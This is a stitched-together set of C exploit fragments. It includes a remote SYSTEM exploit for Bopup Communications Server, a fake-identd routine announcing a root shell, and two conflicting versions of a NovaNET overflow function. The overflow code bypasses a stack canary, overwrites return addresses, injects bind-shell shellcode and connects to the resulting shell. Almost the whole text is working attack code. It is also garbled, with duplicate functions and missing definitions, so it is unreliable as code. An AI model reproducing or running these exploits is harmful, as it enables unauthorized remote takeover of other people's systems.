int
main (int argc, char **argv)
{
char zbuf[BUF_SIZE];
int fd, n;
printf ("Bopup Communications Server remote SYSTEM exploit\n"
"by: <*****@*****.**>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <host>\n", argv[0]);
exit (EXIT_SUCCESS);
}
fd = sockami (argv[1], PORT_BOPUP);
if (fd == -1)
{
fprintf (stderr, "%s: sockami failed\n", argv[0]);
exit (EXIT_FAILURE);
}
printf ("* connected to %s:%d\n\n", argv[1], PORT_BOPUP);
printf ("** SEH offset @+%04X\n", BOPUP_STR_OFFSET + BOPUP_STR_LEN - 8);
printf ("** return addy @0x%08X\n\n", BOPUP_POPRET);
printf ("* building buffer with shellcode...");
zbuffami (zbuf);
printf ("done\n");
printf ("* sending request...");
if ((n = sock_send (fd, zbuf, BOPUP_STR_OFFSET + BOPUP_STR_LEN)) != BOPUP_STR_OFFSET + BOPUP_STR_LEN)
{
fprintf (stderr, "%s: sock_send returned %d (!= %d)\n",
argv[0], n, BOPUP_STR_OFFSET + BOPUP_STR_LEN);
exit (EXIT_FAILURE);
}
printf ("done\n");
close (fd);
printf ("* waiting for the shellcode to be executed...\n");
sleep (2);
if ((fd = sockami (argv[1], PORT_SHELL)) != -1)
{
printf ("+Wh00t!\n\n");
shellami (fd);
}
return (EXIT_SUCCESS);
}
void
keep_clz(void)
{
int sock;
if(host[0] != 0)
{
printf("+Causing an auth request to our fake_identd\n");
sock = sockami2(host, MY_PORT, THEIR_PORT);
printf(" done\n");
close(sock);
printf("+Enjoy your root shell...\n 0x69 =)\n");
sleep(1);
sock = sockami2(host, 6969, 30464);
shellami(sock);
}
}
static void
novanet_own_process (char *thost, char *d_name, int esp_val)
{
char rbuf_pkt[NOVANET_PKT_SZ], *ptr;
int canary_val, fd, n, rlen;
if (novanet_read (thost, (void *) 0x016A6784, &canary_val) == 0)
{
fprintf (stderr, "novanet_own_process: reading canary failed\n");
exit (EXIT_FAILURE);
}
fd = sockami (thost, NOVANET_TCP_PORT);
if (fd == -1)
{
fprintf (stderr, "novanet_own_process: sockami failed\n");
exit (EXIT_FAILURE);
}
printf ("** [nnwindtb.dll @ 0x016A6784] stack canary: 0x%08X\n\n", (int) canary_val);
if (HAS_NULL (CANARY_VAL(canary_val, esp_val)))
{
fprintf (stderr, "novanet_own_process: canary value invalid :(\n");
exit (EXIT_FAILURE);
}
printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);
memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ);
printf ("** sending login packet...");
if ((n = sock_send (fd, login_buf, sizeof login_buf - 1)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** reading fourth packet...");
if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
rlen = 0x10C + 64 + (sizeof win32_x86_bind - 1) + 1;
*(unsigned int *) &rem_buf[12] = rlen + NOVANET_HDR_SZ;
printf ("** sending remaining %d-bytes packet...", rlen);
if ((n = sock_send (fd, rem_buf, sizeof rem_buf - 1)) != NOVANET_HDR_SZ)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, NOVANET_HDR_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** sending hammer packet...");
ptr = malloc (rlen * sizeof (char));
memset (ptr, 0x41, rlen);
*(unsigned int *) &ptr[0x104] = CANARY_VAL(canary_val, esp_val);
*(unsigned int *) &ptr[0x108] = NTDLL_ESP;
memcpy (&ptr[0x10C + 64], win32_x86_bind, sizeof win32_x86_bind - 1);
ptr[rlen - 1] = '\0';
if ((n = sock_send (fd, ptr, rlen)) != rlen)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, rlen);
exit (EXIT_FAILURE);
}
free (ptr);
printf ("done\n\n");
usleep (USLEEP_TIME);
close (fd);
printf ("* waiting for the shellcode to be executed...\n");
sleep (2);
if ((fd = sockami (thost, PORT_SHELL)) != -1)
{
printf ("+Wh00t!\n\n");
shellami (fd);
}
}
static void
novanet_own_process (char *thost, char *d_name)
{
char rbuf_pkt[NOVANET_PKT_SZ], *ptr;
int fd, n, rlen;
fd = sockami (thost, NOVANET_TCP_PORT);
if (fd == -1)
{
fprintf (stderr, "novanet_own_process: sockami failed\n");
exit (EXIT_FAILURE);
}
printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);
memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ);
printf ("** sending login packet...");
if ((n = sock_send (fd, login_buf, sizeof login_buf - 1)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** reading fourth packet...");
if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
rlen = 0x138 + 1;
*(unsigned int *) &rem_buf[12] = rlen + NOVANET_HDR_SZ;
printf ("** sending remaining %d-bytes packet...", rlen);
if ((n = sock_send (fd, rem_buf, sizeof rem_buf - 1)) != NOVANET_HDR_SZ)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, NOVANET_HDR_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** sending hammer packet...");
ptr = malloc (rlen * sizeof (char));
memset (ptr, 0x41, rlen);
*(unsigned int *) &ptr[0x134] = NOVANET_POPRET;
memcpy (&ptr[0], lnx_x86_bind, sizeof lnx_x86_bind - 1);
ptr[rlen - 1] = '\0';
if ((n = sock_send (fd, ptr, rlen)) != rlen)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, rlen);
exit (EXIT_FAILURE);
}
free (ptr);
printf ("done\n\n");
usleep (USLEEP_TIME);
close (fd);
printf ("* waiting for the shellcode to be executed...\n");
sleep (2);
if ((fd = sockami (thost, PORT_SHELL)) != -1)
{
printf ("+Wh00t!\n\n");
shellami (fd);
}
}
